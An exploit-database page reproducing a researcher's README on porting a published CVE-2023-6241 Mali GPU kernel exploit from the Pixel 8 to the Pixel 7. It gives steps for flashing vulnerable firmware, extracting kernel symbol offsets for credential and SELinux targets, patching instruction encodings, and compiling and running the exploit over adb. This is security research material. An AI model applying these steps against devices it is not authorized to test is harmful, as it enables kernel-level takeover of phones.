Share 
## https://sploitus.com/exploit?id=D599963B-C68C-536E-99F9-ED60BC0FE002
# CVE-2023-6241 for Google Pixel 7 
This repository will illustrate how to adapt the exploit published by securitylab in its [GitHub repository](https://github.com/github/securitylab/tree/main/SecurityExploits/Android/Mali/CVE_2023_6241) working for Google Pixel 8 for a Google Pixel 7. 

Before starting the modification of the exploit, the assumption that the original exploit was also working for Google Pixel 7 devices (after the needed patches) was made based on the [article](https://github.blog/security/vulnerability-research/gaining-kernel-code-execution-on-an-mte-enabled-pixel-8/) associated to CVE-2023-6241. This was necessary since the two devices seem different (hardware speaking) ([comparison](https://www.gsmarena.com/compare.php3?idPhone1=11903&idPhone2=12546)). 

## Tools
Here the tools used to perform analysis and extract information or files.
- [Ghidra](https://ghidra-sre.org/)
- [imjtool](https://newandroidbook.com/tools/imjtool.html) (to substitute [abootimg](https://github.com/ggrandou/abootimg) because it seemed to not working with newer Android images)
- [vmlinux-to-elf](https://github.com/marin-m/vmlinux-to-elf)
- [Online Assembler and Disassembler](https://shell-storm.org/online/Online-Assembler-and-Disassembler/)
- [Android flash tool](https://flash.android.com/welcome)
- Android NDK and aarch64-linux-android34-clang compiler

## Workflow
The following is how the goal was achieved starting from the beginning. 

1. Enable the developer options in the device.
   
2. Flash the device with the right security patch (in this case one between [UP1A.231105.003, Nov 2023](https://developers.google.com/android/images#pantherup1a.231105.003) and [UQ1A.240205.002, Feb 2024](https://developers.google.com/android/images#pantheruq1a.240205.002) both included), possibly using Google Chrome and [Android flash tool](https://flash.android.com/welcome) by clicking on "Flash" in the desired entry in [Factory Images for Nexus and Pixel Devices](https://developers.google.com/android/images) page.\
   \
  **Note 1: using Android flash tool to flash the devices can help to solve problems related to the bootloader version. These problems may appear during a flash operation using the script provided with the compressed file downloaded by clicking "Link" inside [Factory Images for Nexus and Pixel Devices](https://developers.google.com/android/images) page.**\
  \
   **Note 2: before flashing the device, in Android flash tool check "Force Flash all partition" to obtain the same result of the script.**

3. Download the desired Android image by clicking on "Link" and extract the *boot.img* file from the compressed "*image-panther<release>.zip*" file inside the main compressed file "*panther-\<release>-factory-<first 8 characters of SHA-256>.zip*"
4. Execute `./imjtool.ELF64 boot.img extract`. The new folder "*extracted*" will be created with two files inside. ![imjtool-output](./imgs/imjtool-output.png)
5. Execute `vmlinux-to-elf ./extracted/kernel.decompressed <filename>.elf` (for future reference `<filename>.elf` will be `Pixel7-kernel.elf`). A new file with the provided name will be created. ![vmlinux-to-elf-output](./imgs/vmlinux-to-elf-output.png)
6. Open "*Pixel7-kernel.elf*" with Ghidra. It's not necessary to perform the automatic analysis since it takes a large amount of time and the information can be still extracted
7. Open the "*Symbol table*" window and search for the interested fields (in this case `avc_den|sel_read_enforce$|init_cred|^commit_creds$`). The result shoud be something like this: ![SymbolTable](./imgs/symbol-table.png)
8. Go to the location address and get the "*Imagebase Offset*" for all the searched fields.
   ![imagebase-offset](./imgs/imagebase-offset.png)
9. Set all the offsets in the exploit according to what has been found. \
   ![set-offset.png](./imgs/set-offset.png)
10. Calculate the value of `ADD_COMMIT_2311` and `ADD_INIT_2311` by finding the HEX value of the following operation respectively `add x8, x8, #0xXXX` and `add x0, x0, #0xYYY` using [Online Assembler and Disassembler](https://shell-storm.org/online/Online-Assembler-and-Disassembler/). To find the values of `XXX` and  `YYY` it's sufficient to copy the lowest 12bits respectively from `COMMIT_CREDS_2311` and `ADD_INIT_2311` (eg if `ADD_COMMIT_2311` is `0x17f0c8`, then the HEX code of `add x8, x8, #0x0c8` is [0x91032108](https://shell-storm.org/online/Online-Assembler-and-Disassembler/?inst=add+x8%2C+x8%2C+%230x0c8&arch=arm64&as_format=hex#assembly)). \
    **Note that the values are expressed in big-endian so the resulting byes need to be reversed**.
12. Copy the `GLES_mali.so` from `/vendor/lib64/egl/libGLES_mali.so` (i.e. `adb pull /vendor/lib64/egl/libGLES_mali.so`) and compile everything with `/home/gobbo/Android/Sdk/ndk/26.1.10909125/toolchains/llvm/prebuilt/linux-x86_64/bin/aarch64-linux-android34-clang -g -DSHELL -DCL_TARGET_OPENCL_VERSION=300 -I. -L. mali_jit_csf.c mem_read_write.c mempool_utils.c -lGLES_mali -o mali_jit_csf`.\
    **Note: just to be timing consistent, the OpenCL library version used in the exploit was the newest available before the security patch that fixed the vulnerability (i.e. [version 2023.04.17](https://github.com/KhronosGroup/OpenCL-Headers/releases/tag/v2023.04.17))**
13. Upload and execute the exploit
    ```
    adb push ./mali_jit_csf /data/local/tmp 
    export LD_LIBRARY_PATH=/vendor/lib64/egl
    ./data/local/tmp/mali_jit_csf
    ```
More information can be retrieved from the GitHub article and GitHub repository mentioned at the beginning.